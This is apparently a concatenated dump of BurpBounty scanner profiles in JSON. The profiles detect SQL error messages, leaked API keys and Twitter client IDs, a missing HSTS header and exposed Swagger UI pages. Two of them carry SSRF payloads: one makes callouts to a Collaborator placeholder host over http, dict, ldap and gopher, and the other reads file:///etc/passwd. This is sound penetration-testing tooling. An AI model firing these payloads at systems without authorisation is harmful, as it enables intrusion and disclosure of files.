"true,,(Exception (condition )?\\d+\\. Transaction rollback|com\\.frontbase\\.jdbc|org\\.h2\\.jdbc|Unexpected end of command in statement \\[\"|Unexpected token.*?in statement \\[|org\\.hsqldb\\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\\bdb2_\\w+\\(|SQLSTATE.+SQLCODE|com\\.ibm\\.db2\\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\\\]Ibm|DB2Exception|Warning.*?\\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\\.informix\\.jdbc|weblogic\\.jdbc\\.informix|Pdo[./_\\\\]Informix|IfxException|Warning.*?\\Wingres_|Ingres SQLSTATE|Ingres\\W.*?Driver|com\\.ingres\\.gcf\\.jdbc|Dynamic SQL Error|Warning.*?\\Wibase_|org\\.firebirdsql\\.jdbc|Pdo[./_\\\\]Firebird|Microsoft Access (\\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \\(missing operator\\) in query expression|Driver.*? SQL[\\-\\_\\ ]*Server|OLE DB.*? SQL Server|\\bSQL Server[^\u0026lt;\u0026quot;]+Driver|Warning.*?\\W(mssql|sqlsrv)_|\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}|System\\.Data\\.SqlClient\\.SqlException|(?s)Exception.*?\\bRoadhouse\\.Cms\\.|Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}|\\[SQL Server\\]|ODBC SQL Server Driver|ODBC Driver \\d+ for SQL Server|SQLServer JDBC Driver|com\\.jnetdirect\\.jsql|macromedia\\.jdbc\\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\\.microsoft\\.sqlserver\\.jdbc|Pdo[./_\\\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027|MySqlClient\\.|com\\.mysql\\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\\\]Mysql|MySqlException|\\bORA-\\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\\.jdbc\\.oracle|oracle\\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\\Wpg_|valid PostgreSQL result|Npgsql\\.|PG::SyntaxError:|org\\.postgresql\\.util\\.PSQLException|ERROR:\\s\\ssyntax error at or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\\.postgresql\\.jdbc|Pdo[./_\\\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\\Wmaxdb_|DriverSapDB|com\\.sap\\.dbtech\\.jdbc|SQLite/JDBCDriver|SQLite\\.Exception|(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException|Warning.*?\\W(sqlite_|SQLite3::)|\\[SQLITE_ERROR\\]|SQLite error \\d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\\.sqlite\\.JDBC|Pdo[./_\\\\]Sqlite|SQLiteException|Warning.*?\\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\\.Data\\.AseClient|com\\.sybase\\.jdbc)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": true,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "SQL Text Detected",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/SSRF-Collaborator.bb | [
{
"ProfileName": "SSRF-Collaborator",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,http://{BC}",
"true,dict://{BC}",
"true,sftp://{BC}",
"true,ldap://{BC}",
"true,gopher://{BC}"
],
"Encoder": [
" "
],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [],
"Tags": [
"Collaborator",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 9,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "SSRF-Collaborator",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "SSRF with payload: \u003cbr\u003e\u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/SSRF-URLScheme.bb | [
{
"ProfileName": "SSRF-URLScheme",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,file:///etc/passwd",
"true,file://\\/\\/etc/passwd"
],
"Encoder": [
" "
],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,root:x"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 9,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "SSRF-URLScheme",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "SSRF-URLScheme with payload: \u003cbr\u003e\u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/StackHawk_API_Key.bb | [
{
"ProfileName": "StackHawk_API_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "StackHawk API Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Strict-Transport-Security.bb | [
{
"ProfileName": "Strict-Transport-Security",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Strict-Transport-Security"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": true,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Strict-Transport-Security",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Security Header \"Strict-Transport-Security\" not present in response.",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Swagger-Finder.bb | [
{
"ProfileName": "Swagger-Finder",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/swagger-ui.html",
"true,/swagger/swagger-ui.html",
"true,/api/swagger-ui.html",
"true,/swagger/index.html",
"true,/v1.0/swagger-ui.html",
"true,/v2.0/swagger-ui.html",
"true,/v3.0/swagger-ui.html"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,id\u003d\"swagger"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 5,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Swagger-Finder",
"IssueSeverity": "Low",
"IssueConfidence": "Firm",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
65
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Swagger_found.bb | [
{
"ProfileName": "Swagger_found",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,swagger-ui.html"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Swagger url found",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "Swagger url found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
Text | BurpBounty/profiles/tags.txt | Collaborator
PathTraversal
RCE
SQLi
CookieAttributes
SecurityHeaders
XSS
JWT
CMS
CVE
Errors
InformationDisclosure
API
SQLi
XXE
endpoints
regex
Variations
Graphql
Cloud
All
Mobile |
BitBake | BurpBounty/profiles/Twitter_Client_ID.bb | [
{
"ProfileName": "Twitter_Client_ID",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)twitter(.{0,20})?[\u0027\\\"][0-9a-z]{18,25}"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Twitter Client ID",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |